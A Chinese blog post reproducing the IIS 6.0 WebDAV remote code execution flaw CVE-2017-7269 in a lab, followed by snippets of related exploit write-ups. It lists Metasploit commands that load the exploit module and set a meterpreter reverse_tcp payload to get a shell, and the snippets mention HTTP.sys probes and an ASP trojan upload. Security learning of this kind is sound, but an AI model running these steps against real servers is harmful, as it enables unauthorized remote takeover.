IIS6远程执行漏洞复现

已于 2023-03-09 16:46:57 修改
阅读量612 收藏 1
点赞数
文章标签: 安全 php web安全
于 2023-03-01 19:58:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53696027/article/details/129288224
版权
文章详细介绍了IIS6.0在开启WebDav服务时存在的一个远程执行漏洞,该漏洞因URL长度未受控导致栈溢出,可被用于远程代码执行。复现过程包括环境搭建、配置MSF、利用攻击插件并设置相关参数,最终成功获取shell权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞介绍

IIS6.0在开启WebDav服务的情况下存在可远程执行漏洞

漏洞原理

在IIS6.0处理PROPFIND指令的时候,由于对URL的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行

影响版本

IIS 6.0

漏洞编号

CVE-2017-7269

复现过程

环境搭建

靶机:192.168.111.139 (win Server 2003 SP2)

攻击机:192.168.111.128 (kali)

IIS服务器开启WebDAV服务

开始菜单-管理攻击-IIS管理

 打开Web服务扩展-找到WebDAV服务点启动

配置MSF

下载exp

因为在Kali自带的MSF中没有这个Windows版本的exp需要自己下载和加载

GitHub - zcgonvh/cve-2017-7269: fixed msf module for cve-2017-7269

将exp上传到MSF中

cp exp所在问位置 -r /usr/share/metasploit-framework/modules/exploits/windows/iis/

打开kali中的MSF工具

msfconsole

 重新加载全部模块

reload_all

 漏洞复现

查找CVE-2017-7269的exp

search CVE_2017_7269

利用攻击插件

use 0

 查看需要配置信息

show options //查看需要配置的信息

配置相关信息

set RHOST 192.168.111.139 //靶机IP
set HttpHost 192.168.111.139 //网站主机
set payload windows/meterpreter/reverse_tcp //设置payload
set RPORT 81 //设置端口,修改自己的端口,默认为80

执行脚本

run

 此时已经完成了漏洞的复现,可以通过这个漏洞拿到shell权限等

漏洞利用

shell

xiaolihello8
关注
iis6.0远程代码执行漏洞复现
shatianyzg的博客
06-12 648
iis6.0远程代码执行漏洞复现(CVE-2017-7269) 实验环境搭建 1.目标机:windows server 2003 r2 需要目标服务器开启WebDAV 靶机IP:192.168.75.134 Kali IP : 192.168.75.129 kali中启动Msf,使用CVE-2017-7269攻击插件 use exploit/windows/iis/cve_2017_7269 没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下
复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 2080
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户权限太低了,尝试了好久的提权。虽然最后没提权成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: <http://”开头的长header PRO
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3568
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
IIS漏洞攻略
最新发布
2302_80982453的博客
03-24 317
2,编辑请求头,增加Range: bytes=0-18446744073709551615字段,看是否存在HTTP.SYS远程代码执行漏洞,返回为416说明存在。1,在windows server 2003 中开启 WebDAV 和写权限,然后访问并使用BP抓包。3,使用payload验证目标是否存在IIS短文件名漏洞,得到的界面为404,说明存在该短文件名。1,访问 windows server 2012 的网站,并使用BP进行抓包。3,将上传的木马文件的内容写入到asp文件中,然后进行连接即可。
http.sys远程代码执行漏洞(MS15-034)
weixin_34307464的博客
08-06 883
0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞0x0...
Microsoft IIS远程代码执行漏洞(CVE-2015-1635)复现
qll71的博客
08-12 1250
内网渗漏 漏洞复现提示:以下是本篇文章正文内容,下面案例可供参考。
IIS 6.0远程代码执行漏洞(CVE-2017-7269)
weixin_33737134的博客
03-30 357
  漏洞简介  Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。InternetInformation Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。  Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDA...
Http.sys远程代码执行漏洞复现
weixin_51387754的博客
04-23 989
Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。
IIS6.0漏洞之CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 4093
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
漏洞复现IIS中间件漏洞
qq_48368964的博客
08-07 2507
HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)
ranuy阮的博客
04-19 2717
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)
mirror97black的博客
01-24 4465
漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出 漏洞
iis6.0远程代码执行(CVE-2017-7269)
qq115399231的博客
08-06 979
环境搭建 使用windows server 2003 R2 下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图) 这里我加了个默认页面 配置iis服务 测试环境准备就绪 window server 2003(靶机):192.168.162.132 kali(攻击机):192.168.162.128 EXP利用 下载 把exp 复制到kali攻击机器的/usr/s...
CVE-2015-1635:IIS远程代码执行漏洞/HTTP.sys 远程执行代码漏洞(MS15-034)
weixin_38896449的博客
06-01 1340
1、漏洞介绍 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响版本: 安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本 2、漏洞检测 执行curl http://11.
IIS 漏洞Http.sys 远程代码执行
qtvb1987的专栏
11-16 704
1.在KB3042553补丁出现前,微软发布声明:今后发布的所有 Windows RT 8.1、Windows 8.1 和 Windows Server 2012 R2 安全更新程序和与安全无关的更新程序都要求安装更新程序 2919355。不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。2.在安装对应补丁的时候,应仔细看微软官网给出的补丁对机器的影响。Microsoft 通过协同的漏洞披露渠道了解到此漏洞的信息。请求的方式,安装更新可以修复此漏洞
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
qq_36711588的博客
03-03 618
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
IIS6.0目录解析漏洞复现及原理解析
热门推荐
wangyuxiang946的博客
07-06 1万+
IIS6.0版本存在目录解析漏洞 , ,asp格式命名的文件夹,其目录下的所有文件都会被IIS当做asp文件来解析
IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记
W小哥
04-24 3221
一、漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve...
CEV远程代码执行漏洞复现
12-27
### CEV远程代码执行漏洞复现方法 对于CEV(Common Vulnerabilities and Exposures)编号下的远程代码执行漏洞,具体复现方式取决于不同的CVE条目。这里将以两个具体的案例来说明实验环境搭建与漏洞利用的方法。 #### CVE-2020-17530 (Struts2-061) 针对此漏洞,在准备好的环境中获取所需Docker镜像并启动服务可以按照如下操作: 进入指定路径 `/vulhub/struts2/s2-061` 后运行命令 `docker-compose up -d` 来部署含有该漏洞的应用程序实例[^2]。 ```bash cd /vulhub/struts2/s2-061 docker-compose up -d ``` 这会自动下载必要的资源文件,并创建一个模拟存在安全缺陷的服务端点供测试人员研究学习之用。 #### CVE-2017-7269 (IIS 6.0) 另一个例子是微软Internet Information Services版本6中的远程代码执行漏洞。为了重现这一情况,建议使用专门设计用于教育目的的安全实验室平台如 Vulfocus 。通过这些工具能够快速建立起具有特定弱点配置的服务器环境[^3]。 一旦选择了合适的虚拟机模板之后,则可以根据官方文档指导完成剩余设置工作直至目标Web应用处于可被攻击的状态下为止。 值得注意的是,在任何情况下都应当确保所有的实践活动都在合法授权范围内开展,并且仅限于受控环境下进行以防止意外损害发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值